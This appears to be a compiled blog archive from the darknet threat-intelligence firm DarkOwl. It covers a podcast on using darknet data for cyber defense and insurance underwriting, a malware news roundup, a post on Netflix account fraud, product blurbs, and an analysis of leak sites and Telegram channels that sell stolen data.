Richard: I’m just endlessly fascinated with the area of threat intelligence because the possibilities in terms of the size of data and the types of questions that can be asked are endless. Obviously you’ve made it clear that one of the most plausible places to look for badness is the dark web as if that really constrains the search surface, for information. How is it that you go about getting at actionable information? You mentioned a little bit about data science and other forms of magic and mysticism, but maybe you can unravel that a little bit for our listeners. Like how does that actually work out? Because the reality is the dark web, it’s a big mysterious place, right? So how do you do it?

Andrew: We have relationships with intelligence providers both in the private sector and in the government. So, you know, this may be story time. So we’ve got alerts set up. If there are specific keywords maybe mentioned, so I’m not having to read, our teams and having to read every chat in every forum across the entire internet. But we obviously care about the insurance industry a lot. There is a threat actor selling access and you know, of course they will anonymize it, right? Not give the keys to the kingdom in the advertisement. So the company was not named, but it was an insurance company, global insurance company. And what was given was the zip code. So just piecing that together and working with one of our co-founders, we were able to figure out exactly which company that was.

And for us on the security side, we are what we consider white hats. So there’s this ethical responsibility, a very focused moral compass. So we did what we considered the right thing, which is to contact this insurance company and let them know that this was going on. And it was through scouring LinkedIn to find, just doing a little open source intelligence like who works at this company in security and would even begin to understand like why I’m trying to message them. And so we were able to get in contact with ’em, this was a Sunday afternoon and it went until maybe 11 at night and they were incredibly thankful. So that was a success story. Maybe we were able to prevent an attack and sort of shut that down before it led to an extortion event.

Richard: That’s awesome.

Ann: Andrew’s insight shows how these tools are used at a firm like Resilience to stop an attack in its tracks. Allison provides two more examples of real world use cases from a more proactive perspective.

Alison: So there’s absolutely a way to look at this data set and sort of get ahead of it. And I think, you know, the most simple example would be, let’s say you’re an organization and all of a sudden next Tuesday you see that 200 of your employees email addresses are part of a, a breach or a compilation or someone, someone says on a forum, “I have 200 email addresses and plain text passwords associated with this company.” And oftentimes they’ll actually put those up as kind of proof of life. And you know, the use case there, Rich, is what are the, if you can get that sample, which we at DarkOwl would pull down and would be in our database, then it becomes a much easier reconnaissance game of instead of just saying, oh my goodness, we have content on the darknet – I don’t know what it is, I don’t know what to do about it, I don’t know how it got there. If you can pull down those email addresses and say, wow, it turns out all 200 of these employees started on September 1st, or all 200 of these employees attended a conference in Florida two months ago, or all 200 of these employees are no longer with the company. Those are three totally different incident responses. You know, one of ’em you don’t even have to deal with, right? One of ’em is, let’s go to our HR platform, why are they, they were all onboarded, but it gives you the context to then figure out what the problem is rather than waiting for it to show up on the front page of the Wall Street Journal that your organization has been subject to XYZ.

So I think the context can provide that proactive piece and allow companies to understand and especially that definitely follows suit in regards to some of it’s more, you mentioned qualitative versus quantitative. Some folks are just looking at it for, in sort of the way you look at Glassdoor content, right? What are people saying about our company? Is there a negative talk about it or you know, is it notorious for easy to break into? I mean there’s a lot that you can gather from sort of the sentiment about how people talk about organizations that can be telling too, for an organization. We do have a sector of, and this is more recent, but it’s growing quickly of clients who are in the TPR, third party risk platform or management, where they’re looking at, think if you’re a huge organization and you’re considering all these different vendors as you kind of want to know how risky is that, do I have some that are, have a great deal of exposure on the dark net would be an a leading indicator that they may not be as buttoned up as you think.

And then that same sort of use case translates really well to the M&A [mergers and acquisitions] space. So we have folks that are looking at the data in regards to potential mergers or acquisitions saying, you know, is this a company I wanna purchase or emerge? Or they get a sense for what their hygiene is in some ways.

Ann: I have one kind of funny question. Sometimes when I find myself in the DarkOwl UI, as I said, I search for myself, the next thing I do is just sort of look at people’s, pick a company that I care about. You know, I’ll just kind of browse plain text passwords. I find them endlessly entertaining to just read like a novel. Do you have any interesting or funny anecdotes about just like, things that you’ve read or seen or been entertained by in this data?

Alison: Yes, absolutely. So, you know, obviously we do a lot of demos of our platform for potential customers and we almost always search for their organization in front of them and show them what content we have. And we have had, I think I’ve been in the room for two, one of ’em was in person, one of ’em was on the phone, but two demos that were extremely embarrassing. And what I mean by that, Ann, is we searched for the organization’s email addresses that had been exposed. Those came up, there were plain text passwords associated with them for someone that was actually on the call and which happens all the time. But the part that was embarrassing is their plain text password was not something you would want.

Ann: Didn’t read it aloud?

Alison: Yeah, no, we did not it out loud.

Ann: Amazing.

Alison: My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet. So…

Ann: Or that’s what they still are on the inside.

Alison: I’ll Leave it at that. So we’ve had some interesting passwords, but yeah, I agree with you. I also read through plain text passwords like a novel. I find it fascinating.

Richard: Embarrassing passwords aside. These examples show how having access to this data allows your organization to be proactive. As Alison highlighted, organizations are using it to hedge their bets on mergers and acquisitions. Another emerging use is occurring in the insurance underwriting space.

Alison: I think we’re kind of at stage one, right? If I was someone underwriting policies for a company, I would just want to know that baseline, like what does that presence look like on the darknet? And I think where we can head, which would be a really neat space to be in, is can we look at that data and then incentivize that company to better their practices, to lower the risk, lower the policy. You know, I think there’s, that’s kind of the proactive piece that I think would be, that we’re headed towards. And there’s obviously a lot of work to be done, but the data can be informative and I think you guys are doing a really nice job at using it.

Richard: Actually, that’s a great opportunity for me to ask Ann a question about how we use your data in our models. Yeah, I’m actually very curious. And you know what, I bet you other people are too.

Ann: Yeah, I mean we use it for underwriting. So we collect data and we look at the results, our models consider the results with exactly what you said Alison, the sort of understanding that the goal is that organizations are not the worst among their peer group.

As I shared, Resilience uses DarkOwl for everything from defensive measures to proactive underwriting insight. Now every business will use this information differently depending on your unique goals, but the key is to use it to your advantage. How do you make sure your company is taking the optimal steps towards cyber resilience? Andrew has some advice.

Andrew: It’s like trying to align your sort of cyber risk with your critical business functions and how those align and if it makes sense financially. To try to build a capability in-house, that is one way, right? But there are also businesses built, that have been members of the intelligence community previously or black hat types previously that do this every day. And so paying for that as a service is another, is another option. But there is no doubt that insight to what is going on on a lot of these forms. And then sort of back to your question as well, Dr. Ann, a lot of the groups that exist, they have very specific requirements in order for you to be let in the room really, right? So sometimes it could be proven track record of successful attacks.

So those are ways they are trying to evade obviously being on these more accessible forums. But back to your question, Rich, there are companies that are built for this. So whether or not it’s better to build an in-house capability or pay for that as a service, either way there are so many reasons why you want to know what’s going on. One, you know, is your company being targeted right now today? Do any of your credentials show up in data dumps? How do I prioritize like patching vulnerabilities? Not saying the only factor to consider is what’s being talked about, what is trending on the dark web, but that is a factor.

Richard: So let me and Ann, I have to drill in here cuz it’s like on this path of operationalizing this stuff, you know, there was the Lockheed Martin kill chain and that was fun to say, I like saying kill chain, but now there’s mitre attack, right? And you know, you have all the STIX and TAXII and you know, the idea that, log aggregators or a scene, whatever you like are now and soar are being able to consume in theory this data and you have data sharing and all that stuff with the intent. I think the belief as a buyer, this is as a consumer, as a CSO, the idea is, hey, you can scale out this sort of stuff without having to have an Andrew and you can make it actionable. That rests uneasy with me. This is maybe just to my own bias, maybe you can tell me a, what sort of value do you get out of like mitre attack, STIX and TAXII? How have you seen that get operationalized in the seam space or log aggregation space? What are your, again, getting back to the CSO or security person listening and thinking about how do I do this and what do I need to look out for? I know that was a big question, but there you go.

Andrew: Sure. So I would say, you know, specifically there is value in like the STIXs of the TAXIIs, right? So any specific indicator of compromise. That anything that I could ingest and automatically be able to detect or flag something specific that is known to be used by a threat actor, that’s great. Like how it all, so how you prioritize what to do first. Like that I think is where the human element comes in. Whether it’s from an incident response perspective or whether it’s trying to, for instance, stop an attack during the reconnaissance phase, like you mentioned the kill chain, so before initial access. Some of our partnerships enable us to have alerting from the intelligence community where they are sitting on the internet and they may see something like a staging sort of operation or preparations like planning being conducted to potentially target a company and then being able to alert that company. Like there’s such a human element to it. I don’t ever see the entire process being completely automated away. I mean that would be sign me up, I’ll find a nice warm beach to sit on.

Richard: Andrew’s point about humans being inseparable and paramount to this entire process, no matter how many autonomous upgrades and AI insights we add to it is key. To illustrate how these layers of security create a strategy that works. I shared a recent story that caught my attention.

There’s an NFT loss where the, where it was guy who’s the CEO of one of these NFT processor, he had his wallet or something hacked into, he lost millions of dollars of NFT value, but he said it didn’t impact his company. Cause they have, they have multi-factor authorization. So I was just thinking about this is the practical thing when we think about customers, like if we start seeing like there’s this campaign for business email compromise, it’s associated this, we see it that it’s a long term drain by thousands of cuts, but these are the practical things that you can do as opposed to just patching, here’s some business process you can put in place. Here’s some other things you can put in place that will, you know, that yes, it’s very shift, right? But could be remedial or really impact reduction. Cause we always get so focused on what can we do that’s innovative from a technical perspective that’s important, but there’s this whole other side of responding to actual loss.

Andrew: It does seem that with novel techniques for attacking, right? Often it comes back to the same control. If implemented correctly could prevent it.

Richard: Yeah, it could be hugely preventative. Yes, we can put great in-line controls in place. Yes, we can put great endpoint, yes, we can do great training, that’s good, but are there things that we can do that in theory can potentially mitigate this becomes harder in large organizations. Like how many people actually are able to move money around? Do you even know? And that’s, that becomes part of an attack service, right? So that’s interesting too.

Andrew: Defense in depth – like all the different layers. It’s more than just training your folks not to click on suspicious emails. Well there’s that, but then there’s also all of these like email filtering processes you can implement as well. Not one thing is gonna be the answer, but layering. I guess I’m explaining defense in depth now too. So I think that’s the answer.

Richard: I think this is a really great, like these sorts of things that people can practically do to protect themselves coming from someone like you is just so useful. All right, Anne, ask your closing question. You’ve been so good, Andrew, you’re awesome.

Ann: Last question. At Resilience, we talk a lot about what makes a company cyber resilient. I’m curious how you would answer that question.

Andrew: So a layered approach to security. It’s not one thing, it’s a lot of layers. So for instance, in business email compromise, we were talking about how training employees to not click on suspicious links or don’t click on ads that are being served up on your real estate. If you’re on an intermediary service provider like you two, right? So it’s not about always necessarily having the highest castle walls and the moat and the drawbridge and everything, but it’s like what makes a company cyber resilient is that, you know, that you might get infiltrated, so to speak, and how can you then quickly quarantine that, get them out. So yeah, a layered approach. Defense in depth. There’s critical security controls that you just have to be a part of every organization. So, you know, it takes a village.

Ann: Alison echoes Andrew’s sentiment by acknowledging the reality that you will be attacked. Having this level of humility is essential, but how you arm yourself and stay vigilant is what will determine your success.

Alison: I think anyone who thinks they have it all figured out and are all buttoned up are the most susceptible. I think we can only strive to be better than someone behind us. I mean, the analogy I like to use is, if you’re in the woods and you run into a bear, you don’t need to outrun the bear. You just need to outrun the other person with you, right? And I think in the cyber resilience space, you don’t wanna be at the bottom of the barrel because that’s the easy pickings. And if you think you’re the best, you’re probably not. There’s always holes. So I think, staying humble and making sure that you’re doing everything you can. I guess that would be my answer.

Ann: Yeah. Awesome.

Richard: So we often talk about the need for more visibility. We’ve got a lot of telemetry on the security tools that we own. It could be scanning, it could be from penetration testing, it could be from security information event management. It could be from your insurance policies and questionnaires. Adding dark web adds a lot more information about an area of extreme uncertainty. And if we get information from there about an actual attack on a specific company or perhaps even a person and or a whole segment, we’ve just really up-leveled our ability to respond. This is why having really great context, context that’s connected across the stuff that you know empirically and the stuff you know, as possibilities and bringing that information to bear with risk transfer is so key and why it’s such a key part of what we do at Resilience.

Ann: The darknet is big, it’s diverse. There are a lot of different types of people in hoodies, not in hoodies, doing a lot of different types of things with different types of data. It’s important that we all stay realistic and and humble and pay attention to what’s going on out in the internet land.

Richard: Thank you to Allison and Andrew for their time, expertise, and valuable insights. And to our production team at Come Alive Creative. Follow the Building Cyber Resilience Podcast wherever you listen so you don’t miss an episode, we’ll catch you on the next show.


Curious how darknet data applies to your use case? Contact us.

Threat Intelligence RoundUp: May

June 01, 2023

Our analyst team shares a few articles each week in our email newsletter which goes every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Hackers swap stealth for realistic checkout forms to steal credit cards – BleepingComputer

A report by Malwarebytes highlights how MageCart skimmers are using real online stores checkout pages and hijacking them with their own fraudulent but realistic-looking forms to steal credit card information. They are displayed as modal HTML pages that are convincingly superimposed onto the original page. At checkout the malware-laden checkout page is sophisticated, sometimes appeared more legitimate than the real one. Read full article.

2. ViperSoftX info-stealing malware now targets password managers – BleepingComputer

The most recent version of the ViperSoftX infostealer has been observed targeting password managers including KneePass and 1Password. Updated and more robust detection-evasion methods are also part of the new stealer. The malware installs targets Chrome, Brave, Edge, and Opera browsers with a malicious extension called VenomSoftX. According to Trend Micro, the malware has targeted the consumer and enterprise sectors in the U.S., Italy, Brazil, India, Australia, Japan, Taiwan, Malaysia, France, and Italy. According to analysts the malware can be distributed as software cracks, activators, and key generators and hides inside the not dangerous-looking software. The new version has additional features for detection-evasion techniques. A standout feature of the malware is its byte mapping used for code encryption which remaps and changes the order of shellcode bytes. Read more.

3. Stealthy MerDoor malware uncovered after five years of attacks  – BleepingComputer

A new Advanced Persistent Threat (APT) group named LanceFly is utilizing a custom, stealthy backdoor called “Merdoor” to target organizations in South and Southeast Asia since 2018. Methods for initial access are unclear, but Symantec has observed the group using methods such as phishing emails, SSH credential brute forcing, and others. Merdoor is put into “’perfhost.exe’ or ‘svchost.exe” which are both real Windows processes through DLL side-loading. The stealthy backdoor is persistent and can remain on devices between reboots. The backdoor establishes connection with a C2 server, from which it can be given instructions. Read full article.

4. BouldSpy Android Spyware: Iranian Government’s Alleged Tool for Spying on Minority Groups – The Hacker News

With a moderate confidence level, Lookout has attributed a malware called BouldSpy (names DAAM by Cyble) to the Law Enforcement Command of the Islamic Republic of Iran. Victims of the malware’s use include minority groups such as “Kurds, Baluchis, Azeris, and Armenian Christian groups.” It is an Android-based malware family, and the intrusion vector appears to be via physical access to devices. It has a C2 panel to influence victim’s devices and creates other malicious applications masqueraded as harmless apps like a currency converter. Among other impressive features it is able to disable battery features so that the victim device will never remove the malware. It utilizes an element from the open source CryDroid, which could indicate the malware is still being developed or being used as a false flag. Read more.

5. Bad Magic’s Extended Reign in Cyber Espionage Goes Back Over a Decade – The Hacker News

Threat actor, Bad Magic (aka Red Stinger), has been linked to a new cyberattacks targeting companies in the Russo-Ukrainian area, but also to multiple activities back in May of 2016 – meaning that this threat actor has been around for longer than originally thought. Read here.

6. Malicious Windows kernel drivers used in BlackCat ransomware attacks – BleepingComputer

According to Trend Micro, the ALPHV ransomware group (aka BlackCat) has been observed employing improved signed malicious Windows kernel drivers, known as “POORTRY,” in order to not be detected while conducting cyberattacks by security software. Read more.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Netflix Password Policy: Cybersecurity Angle

May 26, 2023

Netflix’s recently implemented password policy is receiving widespread complaints for corporate greed and increasing profit margins, but have you considered the degree to which cybersecurity was factored into this decision?

In this blog, DarkOwl analysts highlight password sharing concerns, look at current activity on the darknet targeting Netflix accounts using DarkOwl Vision and predict how the new password policy may affect fraud.

Cybersecurity Concerns

The importance of password hygiene and password protection is no secret. It is a constant topic of discussion in security trainings and amongst the security community – every day we hear of another commercial data or app breach. At this point, everyone can assume their email address and/or password has been leaked on the darknet or deep web. 

Credentials are one of the most sought after and frequently exchanged digital goods in the darknet economy. In many cases, large quantities of compromised accounts will be combined and re-shared across multiple darknet and deep web forums, including dark web adjacent platforms such as Telegram. Criminals leverage this data in a variety of ways. For example, some may use a credential cracking or “stuffing” tool to cross reference emails with other password lists – or use common password conventions to guess the password – and verify an active email and password combo.

Netflix Targeted on the Darknet

Most are guilty of it – sharing a streaming account password with friends a family. After all, there are so many streaming services and we want access to them all! We also know that password sharing is bad practice. Password sharing enables various types of threat actors to gain unauthorized access to a Netflix account. According to Dark Reading:

  • “Sharing a password undermines control over who has access to an account, potentially leading to a greater risk of unauthorized use and account compromise;
  • Once shared, a password can be further distributed or changed, locking out the original user;
  • Worse yet, if the shared password is used across multiple accounts, a malicious actor could gain access to all of them;
  • And sharing passwords can also make users more susceptible to phishing and social engineering attacks.”

Netflix is regularly targeted on the darknet. DarkOwl analysts are currently closely watching to see what happens to unauthorized account access after the new password policy.

Currently we see Netflix targeted in the following ways:

Netflix Stealer Logs

Stealer logs are typically harvested by threat actors using a form of malware known categorized as “info stealers,” such as Raccoon and Redline, and use this data to maliciously gain access to online accounts. The below is an example DarkOwl analysts found on Russian Market (Genesis market replacement).

Source: DarkOwl Vision

Selling Netflix Accounts

The vendor below found selling a Netflix account for $4.95 USD on a traditional darknet marketlace, ASAP MARKET.

Source: DarkOwl Vision

Netflix Full Access Accounts

DarkOwl analysts found Netflix full access accounts being used to to bypass 2FA on Telegram. The post below shows a Telegram user selling various types of Netflix logins in Rupees, suggesting these threat actors are from/living in India.

Conclusion

DarkOwl analysts predict that the updated Netflix password sharing policies will likely combat a lot of the fraud observed on Telegram markets where people sell another person’s Netflix account for as little as a few dollars. However, we all know that cybercriminals and cybercrime are getting more and more sophisticated and creative and it won’t take long for fraudsters to find a new way to continue nefarious activity and reap financial benefits. The DarkOwl analyst team is observing the darknet and taking notes. Keep an eye out for part 2 once the policy has been in place longer for updates of darknet activity targeting Netflix.


Curious how darknet data applies to your use case? Contact us.

Cyber Risk Modeling

May, 2023

Over the past few years, there has been an increase in global cyberattacks, with reports indicating that overall attacks were up 38% in 2022 from years previous. In the USA alone there was a 57% increase, while the UK experienced a 77% increase in cyberattacks. Many of these attacks result in data breaches and ransomware attacks, which cost organizations time and money, as well as long term negative effects such as loss of reputation. 

On top of this, the average cost of a data breach has reached a record high of $4.35 million. The cost of a ransomware attack is $4.54 million, on average, not including the cost of a ransom payment. With cyberattacks on the rise, organizations need better intelligence to enable them to model risk and take mitigating actions, particularly small businesses which are three times more likely to be a target of a cyberattack.

Darknet data is a key source of insight into criminal and other nefarious activity. The darknet—or dark web as it is also referred to—is a layer of the internet that cannot be accessed by traditional browsers. Sensitive corporate information is regularly leaked or sold on the darknet. These sets of darknet data can be used to identify cybersecurity threats and calculate organizational risk. Understanding risk enables an organization to better be prepared for potential threats.


Contact us today to learn how to monitor your darknet exposure.

Track Your Relative Risk on the Darknet

May, 2023

With cyberattacks increasingly on the rise, organizations need better intelligence to safeguard themselves, employees and customers from incidents such as data breaches and ransomware attacks. This rise in illicit cyber activity only increases the need to protect against and determine the likelihood of these attacks.

Cue DarkSonar – DarkOwl’s latest product that serves as a relative risk rating that considers the nature, extent and severity of credential leakage on the darknet to provide a company with a signal that acts as a measurement for a company’s exposure.

In this webinar, attendees:

  • Reviewed the latest stats around the growth of cyberattacks
  • Learned why modeling risk is essential for all organizations of any size
  • Learned how DarkSonar can inform threat modeling, third party risk management, and cyber insurance
  • Saw first hand how DarkSonar can potentially predict the likelihood of cyberattacks

For those that would rather read the presentation, we have transcribed it below. Or, watch on YouTube.

NOTE: Some content has been edited for length and clarity.


Interested in learning how DarkSonar can help alert for potential threats to your organization? Contact us.

Data for Sale on Leak Sites

May 23, 2023

DarkOwl analysts have observed the emergence of leak sites that are dedicated to simply posting leaked data and are not affiliated with known ransomware groups. These leak sites are similar to other darknet marketplaces and forums, but they specialize in selling other people’s data and usually don’t sell other products like malware, drugs, or weapons. The leak sites described here should not be confused with the leak sites and victim blogs used by ransomware gangs.  

Ransomware Services

Ransomware gangs use victim blogs or leak sites as part of what DarkOwl refers to as Ransomware Services: the services related to ransomware threat actors, where victims are announced and their data is leaked if they do not pay. Typically, a ransomware gang will publish the victim’s name, details, and part of the stolen data as proof of its legitimacy. 

Figure 1: Post to Ransomware Gang Leak Site; Source: Daixin Team Tor Site Tor Anonymous Browser 

Leak sites are also used as a means of communication between ransomware groups and their victims to conduct negotiations. In figure 2, Royal ransomware group’s leak page includes a contact form at the top with a list of victims below. That way a victim can check if the sample of data provided is legitimate, and then contact Royal.

Figure 2: Contact Form on Royal Ransomware Leak Site; Source: Tor Anonymous Browser 

Leak sites and victim blog sites are used by ransomware groups as part of their double-extortion techniques. In a double-extortion attack a ransomware gang will encrypt the victim’s files and demand a ransom payment for the decryption key, as well as exfiltrate the data to their own devices. The ransomware gang will then threaten to publish the sensitive data to the darknet or sell it to the highest bidder. Sensitive data published to the darknet or purchased by a darknet actor can expose the victim to future vulnerabilities, such as sophisticated social engineering and phishing attacks.  

Leak sites are a type of darknet marketplace. However, leak sites only sell data. Darknet marketplaces that are not leak sites will sell a variety of other products such as malware, cracking tools, drugs, social engineering and phishing methods, job postings, website penetration testing, detective services, and occasionally weapons. Darknet marketplaces will also sell leaked data (CVVs, ID cards and passports, company data, personal data from apps, etc) along with their other merchandise. Large marketplaces have many vendors and there will usually be a forum section to the marketplace. The leak site DataCloud only has data uploaded by the admin instead of by multiple vendors. Leak sites can be more decentralized and potentially run by a fewer number of individuals than other darknet marketplaces. Furthermore, DarkOwl analysts identified that each of the leak sites analyzed have a robust Telegram component.  

The reliance and usage of Telegram by leak sites is a distinct feature which traditional darknet marketplaces do not have. The Telegram channels associated with the leak site will typically be run by the administrator of the site. Data can be bought and sold on some of the leak site-affiliated Telegram channels. The biggest difference between a Telegram channel and a darknet marketplace is that on Telegram there is a lower bar to entry. A marketplace will usually require a login, password, and ask the user to pass anti-phishing captchas. Unless a Telegram channel is private, anyone can join a public channel. Potentially less sophisticated users with little darknet know-how could learn about and use the markets from their Telegram channel—as could law enforcement and bots.  

Leak Sites

DarkOwl analysts have seen the emergence of new leak sites which differ from leak sites and victim blogs associated with ransomware groups because they are not affiliated with any specific ransomware or hacker group. These act as third-party vendors of leaks and leaked information. Many sell stealer logs, accounts, combo lists, and proxies as well as dumps of leaked data. Accounts available for sale include accounts to VPNs, pornographic sites, streaming services, and mail access. Data can be purchased directly from the darknet leak site or from its Telegram channel. The Telegram channels attached to leak sites are for discussion and are where users can ask for data or DM the admins.

Unsafe

A leak site known as “Unsafe” calls itself a security blog with “published personal data leaks, commercial and military secrets, and compromising information on famous people and public organizations.” They include a disclaimer that they are not a hacking team, but all their data is from hackers. According to them, their blog is a platform for buyers and sellers as well as a middleman service to help parties negotiate (for a fee). 

Each listing keeps a count of the number of times the data has been viewed, the size of the data offered, a link to the company’s website, the company’s revenue, and their country of headquarters. “Proofs” are uploaded for each targeted company. Data in these proofs include full passport photos, ID cards, personal information, sensitive company information, sensitive HR information, financial information, screenshots of texts, credit cards, graphic pictures (including pornographic imagery), and more. Interested buyers can get in contact to buy the data through the Tox IDs provided; one for Support and other for a Sales Manager. All of the data posted is listed as being compromised either on October 23, 2022, or November 26, 2022. DarkOwl has not verified the authenticity of any of the data that is provided on this site.  

The information included in the proofs are open to everyone to view. This could indicate that the data in the proof may be used to attract other cybercriminals to encourage them to buy the full data-set which they can leverage for their own criminal means.  

Figure 3: Home Page for Unsafe Security Blog; Source: Tor Anonymous Browser 

DataCloud

The leak site DataCloud offers combolists, stealer logs, logs, and account access to e-mail services. Interestingly, access to a Yahoo mail account is the only product for sale (for $120), all other data from listings can be downloaded. Analysis indicates that a user can join the site via a subscription-based model. On the site all data is uploaded by the admin. DataCloud has multiple associated Telegram channels, which appear to be used for different purposes.

Figure 4: DataCloud advertising Combo Lists and Leaked Data; Source: Tor Anonymous Browser 
Figure 5: DataCloud Subscription Options; Source: Tor Anonymous Browser 

One Telegram channel is linked under the “Telegram” tab of the site and is used by the admin for posting what appears on the site. In this channel the DataCloud admin directs users to their site, referred to as their forum. Only the administrators post in this Telegram channel.

Figure 6: DataCloud Associated Telegram Channel; Source: Telegram 

The other Telegram channel is linked under the “chat” tab and acts as a forum for the site’s users and visitors. Many darknet marketplaces have a forum component where users can post questions, comments, or anything they want to about the marketplace and beyond. This Telegram channel attached to “chat” is essentially the marketplace’s forum but run on Telegram. This channel is still run by the DataCloud admin; however, it is used by members to request specific data from each other or to advertise data they have. This channel can be used to facilitate direct deals, either for free or for a fee, between users.

Figure 7: DataCloud Associated Telegram Channel; Source: Telegram 

Leak sites that use Telegram channels in conjunction with their website can use feedback and requests from Telegram to curate their data to their customer’s needs. DarkOwl analysts have observed that Telegram plays an integral role in the new leaks sites used just for data downloading and purchasing. Telegram appears to have a more integral role in leak sites than in other darknet marketplaces, almost as if Telegram was an extension of the leak site itself rather than auxiliary.

SQLi Cloud

A leak site that uses a similar structure to DataCloud is SQLi cloud. This site focuses mainly on stealer logs and combolists, which are largely offered for free. Requests can be posted in the Marketplace section where other users can respond.

Figure 8: SQLi Cloud Offers Stealer Logs; Source: Tor Anonymous Browser 

Similar requests to those found in the marketplaces section of the SQLi site can also be found on their Telegram channel. In this Telegram channel an account called “SQLi administrator” posts updates and responds to others in the chat. The channel is also used for requests for specific datasets. However, as with anywhere on the darknet, users must be wary of scammers.

Figure 9: SQLi Associated Telegram Channel; Source: Telegram 

Leak Sites on Telegram

“Cracked group” is a Telegram channel offering data for sale. The data found on this channel ranges from streaming data and stealer logs to data identified by the country it has been taken from e.g., “Vietnam data.” There is an admin for the channel which moderates the channel and posts details of the data available.

Figure 10: Cracked Group Telegram Channel; Source: Telegram 

Unsafe, DataCloud, and Cracked rely mainly on Telegram or have a site with just a few pages built out. In this aspect they are more informal or sparse than would typically be found on a darknet market. All have a Telegram channel. Those with websites have a main marketplace to download data and links to Telegram channels or contact information. Most have an “About Us” page.

Other leak sites are sophisticated marketplaces and forums specializing in the sale and downloading of leaks and personal data. This category includes sites such as Shadow Leaks. Shadow Leaks has the infrastructure of a traditional darknet forum and has features like awards, credits, a forum, and even sponsors. This site offers a larger product suite. Aside from leaks and combolists, products such as programming courses, hacking tutorials, dorks, and more are available.

Figure 11: Shadow Leaks Site; Source: Tor Anonymous Browser 
Figure 12: Data Offered on Shadow Leaks Site; Source: Tor Anonymous Browser 

The sites and Telegram channels covered in this blog post are just a fraction of what is available on the darknet and darknet-adjacent sites in terms of leak sites. Some of them specialize in one area of stolen data, such as only selling credit card information. Or a site will focus on certain parts of leaked data, like stealer logs, and sell them with a few other products.

While selling personal data on the darknet is not a new concept, DarkOwl analysts have noticed a trend of sites that specialize in selling leaked or personal data which are smaller than more well-known marketplaces, yet almost exclusively dedicated to leaked data.

These sites release their leaked information differently from ransomware groups. A wide variety of products for sale such as drugs and malware are not offered. Instead, the leak site focuses almost exclusively on personal data. They have decided to specialize in offering leaked data even though they are not ransomware gangs nor are they ransomware affiliated.

Final Thoughts  

As the widely popular Breached Forums was recently seized by law enforcement and shut down, the darknet community will be keen to see who takes the place of Breached Forums. Breached Forums offered a massive amount of data in one place, could vet the data posted, and was viewed by users of the forum as a trustworthy middleman service to facilitate transactions between vendors. While Breached Forums offered accountability to buying, selling, and downloading leaked data, its centralized nature also helped it become a massive target for law enforcement. The rise of leaks-focused Telegram channels and sites could point to a trend of decentralization. Relying on a hub and spoke model of decentralized darknet networks and darknet-adjacent channels offering leaked data would put darknet users at a higher risk of being scammed but potentially a lower risk of the site being taken down by law enforcement. Overall trends point to small groups and individuals selling leaked data, not just ransomware groups, highlighting that there are more decentralized avenues for individuals to buy, sell, and download leaked data.


Curious to learn how darknet data applies to your use case? Contact us.

Copyright © 2024 DarkOwl, LLC All rights reserved.
Privacy Policy
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.